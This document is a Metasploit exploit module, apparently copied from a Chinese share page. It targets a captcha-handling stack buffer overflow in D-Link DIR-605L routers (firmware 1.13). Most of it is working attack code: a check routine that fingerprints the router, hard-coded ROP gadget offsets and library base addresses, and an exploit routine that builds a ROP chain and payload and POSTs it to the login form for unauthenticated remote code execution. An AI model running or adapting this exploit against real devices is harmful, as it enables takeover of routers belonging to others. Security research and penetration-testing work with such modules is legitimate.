扫码分享
验证:
体验盒子##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking # Because only has been tested on a QEMU emulated environment
HttpFingerprint = { :pattern => [ /Boa/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link DIR-605L Captcha Handling Buffer Overflow',
'Description'=> %q{
This module exploits an anonymous remote code execution on D-Link DIR-605L routers. The
vulnerability exists while handling user supplied captcha information, and is due to the
insecure usage of sprintf on the getAuthCode() function. This module has been tested
successfully on DLink DIR-605L Firmware 1.13 under a QEMU environment.
},
'Author' =>
[
'Craig Heffner', # Vulnerability discovery, original exploit
'juan vazquez' # Metasploit module
],
'License'=> MSF_LICENSE,
'Payload'=>
{
'DisableNops' => true,
'Space' => 3000,
'BadChars'=> "\x00\x67\x26\x2b"
},
'Platform' => ['linux'],
'Arch' => ARCH_MIPSBE,
'References' =>
[
[ 'OSVDB', '86824' ],
[ 'URL', 'http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow/' ]
],
'Targets'=>
[
[ 'DLink DIR-605L 1.13',
{
'Offset'=> 94,
'LibcBase'=> 0x2ab86000, # According to Original Exploit by Craig Heffner
'ApmibBase' => 0x2aaef000, # According to Original Exploit by Craig Heffner
#'LibcBase'=> 0x4212e000, # QEMU environment
#'ApmibBase' => 0x42095000, # QEMU environment
#LOAD:000248D4li$a0, 1 ; set $a0 for the sleep() call
#LOAD:000248D8move$t9, $s1 ; $s1 is controlled after the overflow
#LOAD:000248DCjalr$t9
'Ret' => 0x248D4, # from libc
#LOAD:0002B954move$t9, $s2 # Controlled
#LOAD:0002B958lw$ra, 0x30+var_4($sp)# allows to get controlled $ra from the stack
#LOAD:0002B95Clw$s4, 0x30+var_8($sp)
#LOAD:0002B960lw$s3, 0x30+var_C($sp)
#LOAD:0002B964lw$s2, 0x30+var_10($sp)
#LOAD:0002B968lw$s1, 0x30+var_14($sp) # allows to get controlled $s1 from the stack
#LOAD:0002B96Clw$s0, 0x30+var_18($sp)
#LOAD:0002B970jr$t9
'RopJmpSleep' => 0x2B954, # from libc
'RopSleep'=> 0x23D30, # from libc # Sleep Function Address # sleep() to flush the data cache
#LOAD:000027E8move$t9, $s1 # Controlled
#LOAD:000027ECjalr$t9 ; sub_22D0
#LOAD:000027F0addiu $a2, $sp, 0x40+var_24 ; put pointer to the stack on $a2 # executed because of pipelining
'RopPtrStack' => 0x027E8, # from apmi
#LOAD:00001D78move$t9, $a2 ; $a2 contains a poiner to the stack
#LOAD:00001D7Cjalr$t9
'RopJmpStack' => 0x01D78 # from apmi
}
]
],
'DisclosureDate' => 'Oct 08 2012',
'DefaultTarget' => 0))
end
def check
res = send_request_cgi({ 'uri' => '/comm.asp' })
if res and res.code == 200 and res.body =~ /var modelname="DIR-605L"/ and res.headers["Server"] and res.headers["Server"] =~ /Boa\/0\.94\.14rc21/
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
shellcode = ""
shellcode << rand_text(target['Offset']) # Padding
shellcode << rand_text(4)# $s0
shellcode << [target['LibcBase'] + target['RopJmpSleep']].pack("N")# $s1
shellcode << [target['LibcBase'] + target['RopSleep']].pack("N") # $s2
shellcode << rand_text(4)# $s3
shellcode << [target['LibcBase'] + target.ret].pack("N") # $ra
shellcode << rand_text(0x1c) # filler
shellcode << rand_text(4)# $s0
shellcode << [target['ApmibBase'] + target['RopJmpStack']].pack("N") # $s1
shellcode << rand_text(4)# $s2
shellcode << rand_text(4)# $s3
shellcode << rand_text(4)# $s4
shellcode << [target['ApmibBase'] + target['RopPtrStack']].pack("N") # $ra
shellcode << rand_text(0x1c) # filler
shellcode << payload.encoded # shellcode
print_status("#{peer} - Sending exploit...")
send_request_cgi({
'method' => 'POST',
'uri' => "/goform/formLogin",
'encode_params' => false,
'vars_post' => {
'VERIFICATION_CODE' => 'myvoiceismypassportverifyme',
'VER_CODE'=> '1234',
'login_n' => 'admin',
'FILECODE'=>shellcode,
'curTime' => '1348588030496',
'login_pass'=> 'Zm9vb255b3UA',
'login_name'=> 'admin'
}
})
end
end
体验盒子
